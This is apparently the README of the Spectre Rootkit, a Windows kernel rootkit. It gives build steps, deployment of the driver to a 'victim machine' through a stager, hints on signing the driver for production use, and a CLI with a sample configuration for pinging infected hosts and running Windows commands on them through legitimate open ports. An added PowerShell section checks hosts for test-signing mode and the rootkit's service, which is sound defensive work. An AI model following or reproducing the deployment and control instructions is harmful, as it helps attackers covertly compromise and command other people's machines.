Getting Started
In order to build all of the components of the Spectre Rootkit, you're going to need to install a few things.
- Install Visual Studio 2019 with the "Desktop development with C++" workload. Microsoft has great documentation for installing Visual Studio with C/C++ support here.
- Install the Windows Driver Kit for Visual Studio 2019.
You can build the projects inside of the solution in any order.
The Spectre Rootkit driver is by default built in test-signing mode. For use in production, you will need to bring your own certificate or loading mechanism. "Demystifying Modern Windows Rootkits", presented at both Black Hat USA 2020 and DEF CON 28, explores several methods of signing a rootkit.
You can load the rootkit driver by using the spectre-stager, or install the driver by installing the spectre-kernel.inf file and starting the Spectre Rootkit service.
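The two deployment facts above (the driver is test-signed by default, and the install path registers a "Spectre Rootkit" service from spectre-kernel.inf) are also the two cheapest things a defender can check for on a Windows host. The following PowerShell script is an added example written for this page; it is not part of the Spectre project. It assumes the service is registered under the name or display name "Spectre Rootkit" (taken from the README wording; adjust `$ServiceName` if the installed name differs) and must be run from an elevated prompt, since `bcdedit` needs administrator rights.

```powershell
# Added defensive check, not part of the Spectre project.
# Flags the two artifacts the README describes: test-signing mode enabled
# (required for a test-signed driver to load) and a driver service named
# "Spectre Rootkit" (assumption: name taken from the README text).

$ServiceName = 'Spectre Rootkit'   # assumed service name; adjust as needed

# 1. Boot configuration: is test-signing enabled on the current boot entry?
$bcd = bcdedit /enum '{current}' 2>$null
$testSigning = [bool]($bcd | Select-String -Pattern '^\s*testsigning\s+Yes' -Quiet)
if ($testSigning) {
    Write-Warning 'Test-signing mode is enabled; test-signed kernel drivers can load on this host.'
} else {
    Write-Output 'Test-signing mode is not enabled on the current boot entry.'
}

# 2. Installed kernel driver services matching the assumed name.
$drivers = Get-CimInstance -ClassName Win32_SystemDriver -ErrorAction SilentlyContinue |
           Where-Object { $_.Name -eq $ServiceName -or $_.DisplayName -eq $ServiceName }

if (-not $drivers) {
    Write-Output "No driver service named '$ServiceName' is registered."
}

foreach ($d in $drivers) {
    Write-Warning ("Driver service '{0}' found (state: {1}, start mode: {2}, path: {3})" -f
        $d.Name, $d.State, $d.StartMode, $d.PathName)

    # PathName may carry an NT-style \??\ prefix; strip it before touching the file.
    $path = $d.PathName -replace '^\\\?\?\\', ''
    if ($path -and (Test-Path -LiteralPath $path)) {
        $sig = Get-AuthenticodeSignature -FilePath $path
        $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<none>' }
        Write-Output ("  Authenticode status: {0}; signer: {1}" -f $sig.Status, $signer)
    } else {
        Write-Output "  Driver image not found on disk at '$path'."
    }
}
```

The script reports rather than remediates: a `Warning` for either finding is a prompt to pull the driver image and the boot configuration into a proper investigation, and a host with test-signing enabled is worth examining even when no service by this name is present, since the name is only what the README uses.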
If you built the spectre-kernel project in Debug mode, verbose logging is available by kernel debugging the victim machine. You can learn more about how to set up kernel-mode debugging here.
With everything built, to deploy the Spectre Rootkit to a target machine, simply run the spectre-stager project on the victim machine.
Once you have infected a victim machine, you can use the spectre-cli to control the rootkit.
The Spectre CLI is used for communicating with a host infected with the Spectre Rootkit.
Usage:

```
spectre-cli.exe [module name] [module options]

Modules:
  help
      Displays this help menu.
  configure [output config file]
      Launches the configuration wizard to generate a config file, used in other modules.
  ping [config file name]
      Uses a config file to determine if a host is infected with the Spectre Rootkit.
  command [config file name]
      Uses a config file to execute a Windows command on an infected host.
```
The first step with the CLI is to generate a config file by running the configure module. You can learn more about each configuration value below:
| Name | Description |
|---|---|
| timeout to connect to a port (in ms) | This is the timeout value used when connecting to a victim machine. Keep in mind that the timeout is applied for every connection to each individual port on a machine. |
| number of "obfuscation layers" to apply to outgoing packets | The Spectre Rootkit design allows for "encapsulating packets". This config value specifies how many layers of "encapsulating packets" you want to apply to outgoing packets. The type of encapsulating packet applied to each layer is random. |
| number of times to retry failed responses | This is the number of times the CLI should attempt to receive a response from the victim machine. |
| target IP address | The IPv4 address of the victim machine. |
| ports to target separated by a comma | The Spectre Rootkit design abuses legitimate communication channels to communicate with the rootkit. This is a list of legitimate ports open on the victim machine to attempt to connect to. |
Here is a sample run of the Configuration Wizard:
```
>spectre-cli.exe configure testconfig
Welcome to the Spectre Rootkit.
This configuration wizard is designed to assist you with the generation of a configuration file.
You need a configuration file to use any other module in the Spectre CLI.
Please enter a value for "timeout to connect to a port (in ms)" (default: 1000):
500
Please enter a value for "number of "obfuscation layers" to apply to outgoing packets" (default: 2):
1
Please enter a value for "number of times to retry failed responses" (default: 3):
2
Please enter a value for "target IP address" (default: ):
192.168.1.123
Please enter a value for "ports to target separated by a comma" (default: 135,5040,7680):
135,5040
Saved options to configuration "testconfig".
```
With a config generated, you can use any of the other modules, passing the config file name as the first argument. Before being able to use the command module, you will need to use the ping module at least once. The ping module is responsible for scanning the ports you specified in the Configuration Wizard and determining which ones are under the control of the Spectre Rootkit.